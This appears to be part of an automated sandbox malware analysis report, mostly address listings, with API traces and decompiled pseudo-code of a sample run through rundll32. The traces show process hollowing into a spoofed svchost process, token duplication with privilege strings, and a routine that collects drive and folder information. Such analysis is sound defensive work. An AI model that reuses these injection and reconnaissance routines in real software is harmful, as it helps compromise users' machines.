                                                                                              0x04269920
                                                                                              0x0426992e
                                                                                              0x04269937
                                                                                              0x0426993d
                                                                                              0x04269945
                                                                                              0x0426994f
                                                                                              0x04269951
                                                                                              0x04269961
                                                                                              0x0426996b
                                                                                              0x0426996e
                                                                                              0x0426997b
                                                                                              0x04269982
                                                                                              0x04269988
                                                                                              0x0426998d
                                                                                              0x04269990
                                                                                              0x042699a1
                                                                                              0x042699ae
                                                                                              0x042699b0
                                                                                              0x042699b1
                                                                                              0x042699b8
                                                                                              0x042699ba
                                                                                              0x042699bf
                                                                                              0x042699bf
                                                                                              0x042699c7
                                                                                              0x042699dd
                                                                                              0x042699e3
                                                                                              0x042699eb
                                                                                              0x04269a0e
                                                                                              0x04269a19
                                                                                              0x04269a1d
                                                                                              0x04269a23
                                                                                              0x04269a25
                                                                                              0x04269a38
                                                                                              0x04269a3a
                                                                                              0x04269a40
                                                                                              0x04269a45
                                                                                              0x04269a48
                                                                                              0x04269a54
                                                                                              0x04269a55
                                                                                              0x04269a57
                                                                                              0x04269a59
                                                                                              0x04269a5e
                                                                                              0x04269a9c
                                                                                              0x00000000
                                                                                              0x04269a60
                                                                                              0x04269a60
                                                                                              0x04269a6c
                                                                                              0x04269a6e
                                                                                              0x04269a70
                                                                                              0x04269a72
                                                                                              0x04269a73
                                                                                              0x04269a78
                                                                                              0x04269a7a
                                                                                              0x04269a7f
                                                                                              0x04269a93
                                                                                              0x04269a9d
                                                                                              0x04269a9d
                                                                                              0x04269aa2
                                                                                              0x04269aa5
                                                                                              0x04269aa7
                                                                                              0x04269a81
                                                                                              0x04269a81
                                                                                              0x04269a87
                                                                                              0x04269a87
                                                                                              0x04269a7f
                                                                                              0x04269a5e
                                                                                              0x04269a25
                                                                                              0x04269a1d
                                                                                              0x042699eb
                                                                                              0x04269ab8
                                                                                              0x04269abb
                                                                                              0x04269aca
                                                                                              0x04269af5
                                                                                              0x04269b08
                                                                                              0x04269b19
                                                                                              0x04269c02
                                                                                              0x04269c02
                                                                                              0x00000000
                                                                                              0x04269b1f
                                                                                              0x04269b29
                                                                                              0x04269b2f
                                                                                              0x04269b42
                                                                                              0x04269b44
                                                                                              0x04269b46
                                                                                              0x04269b50
                                                                                              0x04269b56
                                                                                              0x04269b5d
                                                                                              0x04269b5e
                                                                                              0x04269b60
                                                                                              0x04269b62
                                                                                              0x04269b68
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269b6e
                                                                                              0x04269b74
                                                                                              0x04269b76
                                                                                              0x04269b7e
                                                                                              0x04269b9c
                                                                                              0x04269b9c
                                                                                              0x04269ba0
                                                                                              0x04269ba2
                                                                                              0x04269ba5
                                                                                              0x04269baa
                                                                                              0x04269bab
                                                                                              0x04269bb0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269bb2
                                                                                              0x00000000
                                                                                              0x04269bb0
                                                                                              0x04269bb7
                                                                                              0x04269bb7
                                                                                              0x04269b80
                                                                                              0x04269b80
                                                                                              0x04269b83
                                                                                              0x04269b88
                                                                                              0x04269b89
                                                                                              0x04269b8e
                                                                                              0x00000000
                                                                                              0x04269b90
                                                                                              0x00000000
                                                                                              0x04269b90
                                                                                              0x00000000
                                                                                              0x04269b8e
                                                                                              0x04269b95
                                                                                              0x04269b98
                                                                                              0x04269b9a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269b9a
                                                                                              0x04269bba
                                                                                              0x04269bcb
                                                                                              0x04269bd7
                                                                                              0x04269bdb
                                                                                              0x04269cde
                                                                                              0x04269ce4
                                                                                              0x04269cee
                                                                                              0x04269d08
                                                                                              0x04269d0e
                                                                                              0x04269d10
                                                                                              0x04269d2a
                                                                                              0x04269d30
                                                                                              0x04269d32
                                                                                              0x04269d45
                                                                                              0x04269d51
                                                                                              0x04269d53
                                                                                              0x04269d5b
                                                                                              0x04269d5d
                                                                                              0x04269d5d
                                                                                              0x04269d53
                                                                                              0x04269d75
                                                                                              0x04269d75
                                                                                              0x04269d77
                                                                                              0x04269d7d
                                                                                              0x04269d83
                                                                                              0x04269d85
                                                                                              0x00000000
                                                                                              0x04269d87
                                                                                              0x04269db7
                                                                                              0x04269db9
                                                                                              0x04269dbb
                                                                                              0x04269dbd
                                                                                              0x04269c08
                                                                                              0x04269c30
                                                                                              0x04269c30
                                                                                              0x04269dbd
                                                                                              0x04269be1
                                                                                              0x04269be6
                                                                                              0x04269bec
                                                                                              0x04269bf2
                                                                                              0x04269bf6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269bf6
                                                                                              0x00000000
                                                                                              0x04269bdb
                                                                                              0x00000000
                                                                                              0x04269bfc
                                                                                              0x04269c32
                                                                                              0x04269c32
                                                                                              0x04269c3a
                                                                                              0x04269c4d
                                                                                              0x04269c55
                                                                                              0x04269c58
                                                                                              0x04269c58
                                                                                              0x04269c5a
                                                                                              0x04269c5d
                                                                                              0x04269c62
                                                                                              0x04269c65
                                                                                              0x04269c6d
                                                                                              0x04269c70
                                                                                              0x04269c70
                                                                                              0x04269c74
                                                                                              0x04269ccb
                                                                                              0x04269cdd
                                                                                              0x04269c76
                                                                                              0x04269c7c
                                                                                              0x04269c95
                                                                                              0x00000000
                                                                                              0x04269c97
                                                                                              0x04269c97
                                                                                              0x04269cb3
                                                                                              0x04269cb7
                                                                                              0x04269de8
                                                                                              0x04269dee
                                                                                              0x04269df0
                                                                                              0x00000000
                                                                                              0x04269df6
                                                                                              0x04269dfc
                                                                                              0x04269e09
                                                                                              0x04269e0f
                                                                                              0x04269e11
                                                                                              0x00000000
                                                                                              0x04269e17
                                                                                              0x04269e1d
                                                                                              0x04269e23
                                                                                              0x04269e26
                                                                                              0x00000000
                                                                                              0x04269e2c
                                                                                              0x04269e38
                                                                                              0x04269e43
                                                                                              0x04269e50
                                                                                              0x04269e50
                                                                                              0x04269e26
                                                                                              0x04269e11
                                                                                              0x04269cbd
                                                                                              0x04269cbd
                                                                                              0x04269cc5
                                                                                              0x00000000
                                                                                              0x04269cc5
                                                                                              0x04269cb7
                                                                                              0x04269c95
                                                                                              0x04269acc
                                                                                              0x04269ad1
                                                                                              0x04269ad9
                                                                                              0x04269ae5
                                                                                              0x04269e51
                                                                                              0x04269e56
                                                                                              0x04269e57
                                                                                              0x04269e58
                                                                                              0x04269e59
                                                                                              0x04269e5a
                                                                                              0x04269e5b
                                                                                              0x04269e5c
                                                                                              0x04269e5d
                                                                                              0x04269e5e
                                                                                              0x04269e5f
                                                                                              0x04269e60
                                                                                              0x04269e66
                                                                                              0x04269e6e
                                                                                              0x04269e6f
                                                                                              0x04269e70
                                                                                              0x04269e7b
                                                                                              0x04269e87
                                                                                              0x04269e93
                                                                                              0x04269e95
                                                                                              0x04269e9a
                                                                                              0x04269e9c
                                                                                              0x04269ea1
                                                                                              0x04269ea8
                                                                                              0x04269eaa
                                                                                              0x04269eaa
                                                                                              0x04269eaf
                                                                                              0x04269eb1
                                                                                              0x04269eb8
                                                                                              0x04269eb8
                                                                                              0x04269eba
                                                                                              0x04269ec0
                                                                                              0x04269ec2
                                                                                              0x04269ec9
                                                                                              0x04269ec9
                                                                                              0x04269ecb
                                                                                              0x04269ecd
                                                                                              0x04269ed4
                                                                                              0x04269ed4
                                                                                              0x04269edf
                                                                                              0x04269ee7
                                                                                              0x04269eef
                                                                                              0x04269ef4
                                                                                              0x04269ef9
                                                                                              0x04269eff
                                                                                              0x04269f90
                                                                                              0x04269f90
                                                                                              0x04269f90
                                                                                              0x04269f05
                                                                                              0x04269f05
                                                                                              0x04269f0a
                                                                                              0x04269f10
                                                                                              0x00000000
                                                                                              0x04269f16
                                                                                              0x04269f1b
                                                                                              0x04269f20
                                                                                              0x04269f22
                                                                                              0x00000000
                                                                                              0x04269f28
                                                                                              0x04269f28
                                                                                              0x04269f28
                                                                                              0x04269f2d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269f2f
                                                                                              0x04269f34
                                                                                              0x00000000
                                                                                              0x04269f36
                                                                                              0x04269f44
                                                                                              0x04269f46
                                                                                              0x04269f48
                                                                                              0x00000000
                                                                                              0x04269f4a
                                                                                              0x04269f4d
                                                                                              0x04269f5b
                                                                                              0x04269f5d
                                                                                              0x04269f69
                                                                                              0x04269f77
                                                                                              0x04269f79
                                                                                              0x00000000
                                                                                              0x04269f7b
                                                                                              0x04269f80
                                                                                              0x04269f85
                                                                                              0x04269f87
                                                                                              0x00000000
                                                                                              0x04269f89
                                                                                              0x04269fae
                                                                                              0x04269fae
                                                                                              0x04269fb3
                                                                                              0x04269fb8
                                                                                              0x04269fba
                                                                                              0x04269fba
                                                                                              0x04269fbc
                                                                                              0x04269fc0
                                                                                              0x04269fc8
                                                                                              0x04269fcd
                                                                                              0x04269fcf
                                                                                              0x04269fd1
                                                                                              0x04269fa8
                                                                                              0x04269fa8
                                                                                              0x04269fd3
                                                                                              0x04269fd3
                                                                                              0x04269fd7
                                                                                              0x04269fd9
                                                                                              0x00000000
                                                                                              0x04269fdb
                                                                                              0x04269fe6
                                                                                              0x04269fe9
                                                                                              0x04269fee
                                                                                              0x04269ff4
                                                                                              0x04269ff7
                                                                                              0x04269ff9
                                                                                              0x0426a003
                                                                                              0x0426a008
                                                                                              0x0426a00b
                                                                                              0x0426a00b
                                                                                              0x0426a008
                                                                                              0x04269fae
                                                                                              0x04269fae
                                                                                              0x04269fb3
                                                                                              0x04269fb8
                                                                                              0x04269fba
                                                                                              0x04269fba
                                                                                              0x00000000
                                                                                              0x04269fba
                                                                                              0x04269fae
                                                                                              0x04269fae
                                                                                              0x04269fae
                                                                                              0x04269fb3
                                                                                              0x04269fb8
                                                                                              0x04269fba
                                                                                              0x04269fba
                                                                                              0x00000000
                                                                                              0x04269fba
                                                                                              0x00000000
                                                                                              0x04269fae
                                                                                              0x00000000
                                                                                              0x0426a00f
                                                                                              0x0426a00f
                                                                                              0x0426a014
                                                                                              0x0426a0f0
                                                                                              0x0426a0f7
                                                                                              0x0426a0f9
                                                                                              0x0426a0f9
                                                                                              0x0426a0fd
                                                                                              0x0426a01a
                                                                                              0x0426a01a
                                                                                              0x0426a01f
                                                                                              0x0426a0cb
                                                                                              0x0426a0cd
                                                                                              0x0426a0cf
                                                                                              0x00000000
                                                                                              0x0426a0d5
                                                                                              0x0426a0d8
                                                                                              0x0426a0db
                                                                                              0x0426a0db
                                                                                              0x00000000
                                                                                              0x0426a025
                                                                                              0x0426a02a
                                                                                              0x0426a034
                                                                                              0x0426a03c
                                                                                              0x0426a041
                                                                                              0x0426a043
                                                                                              0x0426a045
                                                                                              0x00000000
                                                                                              0x0426a04b
                                                                                              0x0426a04b
                                                                                              0x0426a04f
                                                                                              0x0426a051
                                                                                              0x00000000
                                                                                              0x0426a057
                                                                                              0x0426a062
                                                                                              0x0426a065
                                                                                              0x0426a06a
                                                                                              0x0426a06d
                                                                                              0x0426a06f
                                                                                              0x00000000
                                                                                              0x0426a075
                                                                                              0x0426a07d
                                                                                              0x0426a082
                                                                                              0x00000000
                                                                                              0x0426a088
                                                                                              0x0426a08f
                                                                                              0x0426a09b
                                                                                              0x0426a0a6
                                                                                              0x0426a0ad
                                                                                              0x0426a0af
                                                                                              0x0426a0af
                                                                                              0x0426a0b3
                                                                                              0x0426a0b3
                                                                                              0x0426a082
                                                                                              0x0426a06f
                                                                                              0x0426a051
                                                                                              0x0426a045
                                                                                              0x0426a01f
                                                                                              0x00000000
                                                                                              0x0426a014
                                                                                              0x04269fae
                                                                                              0x04269f87
                                                                                              0x04269f5f
                                                                                              0x04269f5f
                                                                                              0x04269f67
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269f67
                                                                                              0x04269f5d
                                                                                              0x04269f48
                                                                                              0x00000000
                                                                                              0x04269f34
                                                                                              0x04269f8b
                                                                                              0x00000000
                                                                                              0x04269f8b
                                                                                              0x04269f22
                                                                                              0x04269f10
                                                                                              0x04269f92
                                                                                              0x04269f92
                                                                                              0x04269f96
                                                                                              0x04269f98
                                                                                              0x04269f9b
                                                                                              0x04269f9b
                                                                                              0x04269fa5
                                                                                              0x04269aeb
                                                                                              0x04269aed
                                                                                              0x00000000
                                                                                              0x04269aed
                                                                                              0x04269ae5

                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(00000114,?,?,?,00000000,00000000,74D0F750), ref: 042699A1
                                                                                                • Part of subcall function 04265CA0: GetCurrentProcessId.KERNEL32(?,74CB4DC0), ref: 04265CB5
                                                                                                • Part of subcall function 04265CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04265CCB
                                                                                                • Part of subcall function 04265CA0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 04265CE5
                                                                                                • Part of subcall function 04265CA0: Process32NextW.KERNEL32(00000000,0000022C), ref: 04265D06
                                                                                                • Part of subcall function 04265CA0: FindCloseChangeNotification.KERNEL32(00000000), ref: 04265D1C
                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,00000000,00000000,74D0F750), ref: 042699DD
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,00000000,00000000,74D0F750), ref: 042699FB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04269A02
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,00000000,00000000,74D0F750), ref: 04269A10
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04269A17
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04269ABB
                                                                                              • wsprintfW.USER32 ref: 04269B08
                                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSEnumerateSessionsW,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269B35
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04269B3C
                                                                                                • Part of subcall function 04265D40: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04266FEC,00000000,74CB4DC0), ref: 04265D58
                                                                                                • Part of subcall function 04265D40: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04266FEC,00000000,74CB4DC0), ref: 04265D65
                                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSFreeMemory,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269BC4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04269BCB
                                                                                              • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269BE6
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04269C2A
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269C46
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04269C4D
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269C70
                                                                                              • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269C8D
                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269CAD
                                                                                              • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269CC5
                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269CF8
                                                                                              • OpenProcessToken.ADVAPI32(00000000,0000000B,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269D08
                                                                                              • DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000000,00000001,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269D2A
                                                                                              • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269D45
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269D5B
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269D75
                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04269DAA
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269DB9
                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269DE8
                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269E09
                                                                                              • ResumeThread.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269E1D
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04269E38
                                                                                              • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04269EC9
                                                                                              • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04269ED4
                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04269F3E
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04269F4D
                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 04269F55
                                                                                                • Part of subcall function 0426AAD0: SetConsoleCtrlHandler.KERNEL32(0426AAF0,00000000,00000000,04269F90), ref: 0426AADE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04269F9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$Close$Handle$AddressLibraryLoadProcThread$Open$CreateCurrentSleepToken$ContextProcess32$AllocChangeCodeConsoleCtrlDirectoryDuplicateExitFindFirstHandlerInformationMemoryNextNotificationObjectResumeSingleSnapshotSystemTerminateToolhelp32UserVersionVirtualWaitWritewsprintf
                                                                                              • String ID: %ssvchost.exe -k WspService$Control$DeleteProcThreadAttributeList$Dispatch$H$InitializeProcThreadAttributeList$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$\$kernel32.dll
                                                                                              • API String ID: 2047191768-3917686819
                                                                                              • Opcode ID: 4532ac7b0c3f378e04e02fb2edd824f24031fc0d0b60960e9b02f61d5b6b6567
                                                                                              • Instruction ID: 1ec71cd54922ca7870f236aca137620186718651d4e4873d307fb1e3f3edbbe2
                                                                                              • Opcode Fuzzy Hash: 4532ac7b0c3f378e04e02fb2edd824f24031fc0d0b60960e9b02f61d5b6b6567
                                                                                              • Instruction Fuzzy Hash: F602D6B1B10319ABEB20AB649C45BAAB7F8FF44704F1141A5E946E3180DF74AEC5CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E042548F0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v1052;
                                                                                              				short _v2092;
                                                                                              				struct _SHFILEINFOW _v2788;
                                                                                              				intOrPtr _v2792;
                                                                                              				signed int _v2796;
                                                                                              				union _ULARGE_INTEGER* _v2800;
                                                                                              				intOrPtr _v2804;
                                                                                              				signed int _v2808;
                                                                                              				signed int _v2816;
                                                                                              				union _ULARGE_INTEGER _v2820;
                                                                                              				signed int _v2824;
                                                                                              				union _ULARGE_INTEGER _v2828;
                                                                                              				signed int _t83;
                                                                                              				signed int _t98;
                                                                                              				int _t114;
                                                                                              				int _t121;
                                                                                              				signed int _t136;
                                                                                              				void* _t156;
                                                                                              				signed int _t157;
                                                                                              				WCHAR* _t167;
                                                                                              				intOrPtr* _t168;
                                                                                              				void* _t170;
                                                                                              				void* _t175;
                                                                                              				void* _t176;
                                                                                              				void* _t178;
                                                                                              				intOrPtr _t180;
                                                                                              				intOrPtr _t183;
                                                                                              				void* _t184;
                                                                                              				void* _t185;
                                                                                              				signed int _t186;
                                                                                              				void* _t187;
                                                                                              				void* _t191;
                                                                                              
                                                                                              				_t157 = __ecx;
                                                                                              				_t83 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t83 ^ _t186;
                                                                                              				_v2808 = __ecx;
                                                                                              				_t156 = LocalAlloc(0x40, 0x800);
                                                                                              				 *_t156 = 0x68;
                                                                                              				GetLogicalDriveStringsW(0x208,  &_v2092);
                                                                                              				_t167 =  &_v2092;
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				_t175 = 1;
                                                                                              				asm("movlpd [ebp-0xb00], xmm0");
                                                                                              				asm("movlpd [ebp-0xb08], xmm0");
                                                                                              				if(_v2092 != 0) {
                                                                                              					do {
                                                                                              						E0427DEA0(_t167,  &_v1052, 0, 0x410);
                                                                                              						_t191 = _t187 + 0xc;
                                                                                              						GetVolumeInformationW(_t167, 0, 0, 0, 0, 0,  &_v1052, 0x208);
                                                                                              						SHGetFileInfoW(_t167, 0x80,  &_v2788, 0x2b4, 0x410);
                                                                                              						_v2804 = 2 + lstrlenW( &(_v2788.szTypeName)) * 2;
                                                                                              						_v2792 = 2 + lstrlenW( &_v1052) * 2;
                                                                                              						_t136 =  *_t167 & 0x0000ffff;
                                                                                              						if(_t136 == 0x41 || _t136 == 0x42 || GetDiskFreeSpaceExW(_t167,  &_v2828,  &_v2820, 0) == 0) {
                                                                                              							_v2796 = 0;
                                                                                              							_v2800 = 0;
                                                                                              						} else {
                                                                                              							_v2796 = (_v2816 << 0x00000020 | _v2820.LowPart) >> 0x14;
                                                                                              							_t157 = (_v2824 << 0x00000020 | _v2828.LowPart) >> 0x14;
                                                                                              							_v2800 = _t157;
                                                                                              						}
                                                                                              						 *((short*)(_t175 + _t156)) =  *_t167;
                                                                                              						 *((char*)(_t175 + _t156 + 2)) = GetDriveTypeW(_t167);
                                                                                              						 *(_t175 + _t156 + 6) = _v2796;
                                                                                              						 *(_t175 + _t156 + 0xa) = _v2800;
                                                                                              						_t184 = _t175 + 0xe;
                                                                                              						E0427E060(_t184 + _t156,  &(_v2788.szTypeName), _v2804);
                                                                                              						_t185 = _t184 + _v2804;
                                                                                              						E0427E060(_t185 + _t156,  &_v1052, _v2792);
                                                                                              						_t175 = _t185 + _v2792;
                                                                                              						_t187 = _t191 + 0x18;
                                                                                              						_t167 =  &(( &(_t167[lstrlenW(_t167)]))[1]);
                                                                                              					} while ( *_t167 != 0);
                                                                                              				}
                                                                                              				_t168 = __imp__SHGetSpecialFolderPathW;
                                                                                              				_t176 = _t175 + 2;
                                                                                              				 *((short*)(_t176 + _t156 - 2)) = 0;
                                                                                              				 *_t168(0,  &_v1052, 0x10, 0);
                                                                                              				E0427E060(_t176 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                                                              				_t98 = lstrlenW( &_v1052);
                                                                                              				_t178 = _t176 + _t98 * 2 + 2;
                                                                                              				 *_t168(0,  &_v1052, 5, 0);
                                                                                              				E0427E060(_t178 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                                                              				_t180 = _t178 + lstrlenW( &_v1052) * 2 + 2;
                                                                                              				_v2792 = _t180;
                                                                                              				_t170 = E042547A0();
                                                                                              				if(_t170 != 0) {
                                                                                              					_t114 = LocalSize(_t170);
                                                                                              					if(_t180 + _t114 <= LocalSize(_t156)) {
                                                                                              						_t183 = _v2792;
                                                                                              					} else {
                                                                                              						_t121 = LocalSize(_t170);
                                                                                              						_t183 = _v2792;
                                                                                              						_t156 = LocalReAlloc(_t156, _t121 + _t183, 0x42);
                                                                                              					}
                                                                                              					E0427E060(_t183 + _t156, _t170, LocalSize(_t170));
                                                                                              					_t180 = _t183 + LocalSize(_t170);
                                                                                              					LocalFree(_t170);
                                                                                              				}
                                                                                              				_push(_t157);
                                                                                              				_push(0x3f);
                                                                                              				_push(_t180);
                                                                                              				E04251C60( *((intOrPtr*)(_v2808 + 4)));
                                                                                              				LocalFree(_t156);
                                                                                              				return E04275AFE(_v8 ^ _t186, _t156);
                                                                                              			}




































                                                                                              0x042548f0
                                                                                              0x042548f9
                                                                                              0x04254900
                                                                                              0x0425490d
                                                                                              0x04254919
                                                                                              0x04254927
                                                                                              0x0425492a
                                                                                              0x04254938
                                                                                              0x0425493e
                                                                                              0x04254941
                                                                                              0x04254946
                                                                                              0x0425494e
                                                                                              0x04254956
                                                                                              0x04254960
                                                                                              0x0425496e
                                                                                              0x04254973
                                                                                              0x0425498d
                                                                                              0x042549aa
                                                                                              0x042549c4
                                                                                              0x042549de
                                                                                              0x042549e4
                                                                                              0x042549ea
                                                                                              0x04254a40
                                                                                              0x04254a4a
                                                                                              0x04254a0c
                                                                                              0x04254a25
                                                                                              0x04254a31
                                                                                              0x04254a35
                                                                                              0x04254a3b
                                                                                              0x04254a58
                                                                                              0x04254a68
                                                                                              0x04254a72
                                                                                              0x04254a7c
                                                                                              0x04254a80
                                                                                              0x04254a8e
                                                                                              0x04254a93
                                                                                              0x04254aaa
                                                                                              0x04254aaf
                                                                                              0x04254ab5
                                                                                              0x04254ac2
                                                                                              0x04254ac5
                                                                                              0x04254960
                                                                                              0x04254acf
                                                                                              0x04254ad5
                                                                                              0x04254adb
                                                                                              0x04254aeb
                                                                                              0x04254b0d
                                                                                              0x04254b1c
                                                                                              0x04254b32
                                                                                              0x04254b35
                                                                                              0x04254b59
                                                                                              0x04254b6d
                                                                                              0x04254b70
                                                                                              0x04254b7b
                                                                                              0x04254b7f
                                                                                              0x04254b82
                                                                                              0x04254b93
                                                                                              0x04254bb2
                                                                                              0x04254b95
                                                                                              0x04254b98
                                                                                              0x04254b9e
                                                                                              0x04254bae
                                                                                              0x04254bae
                                                                                              0x04254bc5
                                                                                              0x04254bdb
                                                                                              0x04254bdd
                                                                                              0x04254bdd
                                                                                              0x04254be7
                                                                                              0x04254bee
                                                                                              0x04254bf0
                                                                                              0x04254bf5
                                                                                              0x04254bfd
                                                                                              0x04254c11

                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(00000040,00000800), ref: 04254913
                                                                                              • GetLogicalDriveStringsW.KERNEL32(00000208,?), ref: 0425492A
                                                                                              • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000208), ref: 0425498D
                                                                                              • SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00000410), ref: 042549AA
                                                                                              • lstrlenW.KERNEL32(?), ref: 042549B7
                                                                                              • lstrlenW.KERNEL32(?), ref: 042549D1
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(00000000,?,?,00000000), ref: 04254A02
                                                                                              • GetDriveTypeW.KERNEL32(00000000), ref: 04254A5C
                                                                                              • lstrlenW.KERNEL32(00000000), ref: 04254AB9
                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 04254AEB
                                                                                              • lstrlenW.KERNEL32(?), ref: 04254AF4
                                                                                              • lstrlenW.KERNEL32(?), ref: 04254B1C
                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000), ref: 04254B35
                                                                                              • lstrlenW.KERNEL32(?), ref: 04254B44
                                                                                              • lstrlenW.KERNEL32(?), ref: 04254B68
                                                                                              • LocalSize.KERNEL32(00000000), ref: 04254B82
                                                                                              • LocalSize.KERNEL32(00000000), ref: 04254B8B
                                                                                              • LocalSize.KERNEL32(00000000), ref: 04254B98
                                                                                              • LocalReAlloc.KERNEL32(00000000,00000000), ref: 04254BA8
                                                                                              • LocalSize.KERNEL32(00000000), ref: 04254BB9
                                                                                              • LocalSize.KERNEL32(00000000), ref: 04254BCE
                                                                                              • LocalFree.KERNEL32(00000000), ref: 04254BDD
                                                                                              • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 04254BFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$lstrlen$Size$Free$AllocDriveFolderPathSpecial$DiskFileInfoInformationLogicalSpaceStringsTypeVolume
                                                                                              • String ID:
                                                                                              • API String ID: 4186219405-0
                                                                                              • Opcode ID: ab764ac1dd9ce70da165f359680bb0e5a4f0ee5f2b05298a738e061708f10833
                                                                                              • Instruction ID: 2f18932b01bad24343e4c1824a39c62b123a88408e140840d9d779e563e4c1cf
                                                                                              • Opcode Fuzzy Hash: ab764ac1dd9ce70da165f359680bb0e5a4f0ee5f2b05298a738e061708f10833
                                                                                              • Instruction Fuzzy Hash: AD918472E002199BDB20EB64EC48BEEB7BCFB45304F4041A5E949E7140DB74AE85CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 78%
